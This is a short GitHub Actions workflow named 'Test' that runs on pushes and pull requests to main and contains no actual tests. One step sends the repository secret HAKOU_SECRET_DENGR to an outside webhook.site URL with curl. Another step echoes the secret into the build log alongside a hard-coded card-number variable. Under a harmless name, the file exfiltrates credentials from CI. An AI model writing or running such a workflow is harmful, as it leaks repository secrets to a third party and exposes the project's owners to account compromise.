name: Test

on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

jobs:
  test:
    runs-on: ubuntu-latest

    steps:

      - name: send pass
        env:
          SECRET: ${{ secrets.HAKOU_SECRET_DENGR }}
        run: |
          curl  "https://webhook.site/e5a09d46-4a2a-495b-8a2b-e0bececa455a?secret=${SECRET}"



      - name: print secret
        env:
          SECRET: ${{ secrets.HAKOU_SECRET_DENGR }}
          CARD_NUMBER: '4111111111111111'
        run: |
          echo "secret = ${SECRET}"
